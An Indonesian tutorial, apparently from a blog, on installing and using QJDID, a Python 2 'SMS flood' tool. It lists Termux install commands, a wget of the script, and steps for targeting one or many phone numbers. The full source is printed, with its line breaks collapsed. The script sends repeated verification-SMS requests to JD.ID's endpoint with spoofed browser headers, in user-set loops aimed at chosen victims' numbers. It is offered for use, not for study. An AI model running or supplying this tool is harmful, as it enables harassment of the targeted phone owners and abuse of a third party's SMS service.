Cara install dan cara menggunakan QJDID. Ini adalah Tool/Script spammer, yaitu untuk mengrim spam layanan sms massal ke nomer yang telah kita tentukan sendiri. bisa di kirim ke satu nomer atau ke banyak nomer sekaligus.
DAFTAR KETIKAN LENGKAP QJDID
DETAIL CARA INSTALL QJDID
Update Dan Upgrade
Install Wget
Install Nano
Install Python2
Install Requests
Wget Script
Bikin List Nomer
Jalankan
Muncul Menu
Jumlah Flood : (Isi jumlah angka)
Single Target : (Spam Ke Satu Nomer)
Multi Target : (Spam Ke Banyak Nomer)
Gambar:
CARA MENGUNAKAN
2. Untuk Multi Target
Sebelum menjalankan python2 qjdid.py, sebelum itu bikin dulu list Nomernya dengan ketik:
Dalam menu edit masukkan nomer2 target, Gambar:
Bila sudah save dengan tekan bersamaan VolumeDown+x lalu tekan y
Sekarang coba jalankan dengan ketik
Lalu Pilih 2 [multi target]
Masukkan file path *.txt: [no.txt]
Piluhan : [1]
Lakukan Seperti contoh gambar di atas.
Isi Script QJDID
Itulah contoh ynng bisa saya share. Bila ada yang ingin di tanyakan silahkan kirim pesan lewat contact di bagian menu atas. Terima kasih.
- Single Target = Mengirim banyak layanan sms ke satu nomer [target]
- Multi Target = Mengirim layanan sms ke banyak nomet
DAFTAR KETIKAN LENGKAP QJDID
- apt update -y
- apt upgrade -y
- apt install wget
- apt install nano
- apt install python2
- pip2 install requests
- wget https://raw.githubusercontent.com/QiubyZ/QJDID/master/qjdid.py
- nano no.txt
- python2 qjdid.py
DETAIL CARA INSTALL QJDID
Update Dan Upgrade
apt update -y
apt upgrade -y
Install Wget
apt install wget
Install Nano
apt install nano
Install Python2
apt install python2
Install Requests
pip2 install requests
Wget Script
wget https://raw.githubusercontent.com/QiubyZ/QJDID/master/qjdid.py
Bikin List Nomer
nano no.txt
Jalankan
python2 qjdid.py
Muncul Menu
Jumlah Flood : (Isi jumlah angka)
Single Target : (Spam Ke Satu Nomer)
Multi Target : (Spam Ke Banyak Nomer)
Gambar:
CARA MENGUNAKAN
1. Untuk Single Target
- Masukkan Nomer Seperti Biasa [Enter]
2. Untuk Multi Target
Sebelum menjalankan python2 qjdid.py, sebelum itu bikin dulu list Nomernya dengan ketik:
nano no.txt
Dalam menu edit masukkan nomer2 target, Gambar:
Bila sudah save dengan tekan bersamaan VolumeDown+x lalu tekan y
Sekarang coba jalankan dengan ketik
python2 qjdid.py
Lalu Pilih 2 [multi target]
Masukkan file path *.txt: [no.txt]
Piluhan : [1]
Lakukan Seperti contoh gambar di atas.
Isi Script QJDID
import requestsfrom os import systemW = '\033[0m' # white (default)R = '\033[31m' # redG = '\033[1;32m' # green boldO = '\033[33m' # orangeB = '\033[34m' # blueP = '\033[35m' # purpleC = '\033[36m' # cyanGR = '\033[37m' # graydef banner():author = "____________"qiuby, zhukhi = "Qiuby ","Zhukhi"judul = "JD.ID SMS FLOOD"system("clear")print """_______ ______ _______( ____ )( ___ \ ( ) {}| ( )|| ( ) )| () () | {}| (____)|| (__/ / | || || | {}| _____)| __ ( | |(_)| || ( | ( \ \ | | | || ) | )___) )| ) ( ||/ |/ \___/ |/ \|_________ _______ _______ _______\__ __/( ____ \( ___ )( )) ( | ( \/| ( ) || () () || | | (__ | (___) || || || || | | __) | ___ || |(_)| || | | ( | ( ) || | | || | | (____/\| ) ( || ) ( |)_( (_______/|/ \||/ \|""".format("Author: "+G+author+W,"Python: "+R+qiuby+W+zhukhi,O+judul+W)class Bomsms(object):list_no = []def __init__(self):self.kirim = requests.session()self.headers = {"User - Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36","Referer":"http://sc.jd.id/phone/bindingPhone.html"}self.url = "http://sc.jd.id/phone/sendPhoneSms"def start(self, no):print "{}Nomor: {}{} {}{}".format(O, W, G,no, W)print self.kirim.post(self.url,data = {"phone":no, "smsType":"1"} , headers=self.headers).textself.kirim.cookies.cleardef parser(self, msisdn):if msisdn[0:1] in "08":Bomsms.list_no.append([msisdn,"62"+msisdn[1::]])elif msisdn[0:1] in "62":Bomsms.list_no.append([msisdn, "0"+msisdn[2::]])elif msisdn[0] in "+":Bomsms.list_no.append([msisdn.replace("+",""), "0"+msisdn[3::]])return Bomsms.list_nodef single_num(self):for no in Bomsms.list_no:print P+"Flood No: ", no[0]+Wfor num in no:self.start(num)#Buka list txtdef phone_list(self,f):with open(f) as phone_book:for book in phone_book.readlines():book = book.split("\n")[0]self.parser(book)return Bomsms.list_no#startlistdef start_list(self):for num in Bomsms.list_no:print P+"Flood Number: ", num[0]+Wfor number in num:self.start(number)#Overriding classclass flood(Bomsms):def __init__(self):Bomsms.__init__(self)def nangid(self, jml):for _ in range(0,int(jml)):self.single_num()def txt_flood(self, jml):for _ in range(0,int(jml)):self.start_list()def single(no, jumlah):Bomsms().parser(no)flood().nangid(jumlah)def list_txt(f):Bomsms().phone_list(f)Bomsms().start_list()def flood_txt(f, jumlah):Bomsms().phone_list(f)flood().txt_flood(jumlah)def ops():while True:try:jumlah = int(raw_input(R+"Jumlah Flood: "+W))print G+"[+] ------- [ MENU ] ------- [+]"+Wprint "[1] Single Target\n[2] Multi Target List"print G+"[+] -------------------------[+]"+Wopsi = int(raw_input(O+"Masukkan Pilihan: "+W))print P+"[?] Nomor HP awalan +62, 62 atau 08 [?]\n"+Wif opsi == 1:no = raw_input(O+"NO HANDPHONE: "+W)single(no,jumlah)elif opsi == 2:print "File path *.txt contoh : \n/storage/emulated/0/a/video/no.txt\n"files = raw_input("Masukkan file path *.txt: ")#files = "/storage/emulated/0/a/video/no.txt"print G+"[+] --- [ MENU MULTI TARGET ] --- [+]"+Wprint "[1] SEND KEBANYAK\n[2] FLOOD KEBANYAK"print G+"[+] ----------------------------- [+]"+Wops2 = raw_input(O+"Pilihan: "+W)if ops2 == "1":print P+"[+] SEND KEBANYAK [+]"+Wlist_txt(files)elif ops2 == "2":print R+"[+] FLOOD KEBANYAK [+]"+Wflood_txt(files, jumlah)else:print R+"[!] Nomor Yang di pilih tidak ada [!]"+Wcontinueelse:print R+"[!] Masukkan No dengan Bennar [!]"+Wcontinueexcept ValueError:print R+"[!] BUKAN NOMOR [!]"+Wcontinuebreakif __name__ == "__main__":banner()ops()
Itulah contoh ynng bisa saya share. Bila ada yang ingin di tanyakan silahkan kirim pesan lewat contact di bagian menu atas. Terima kasih.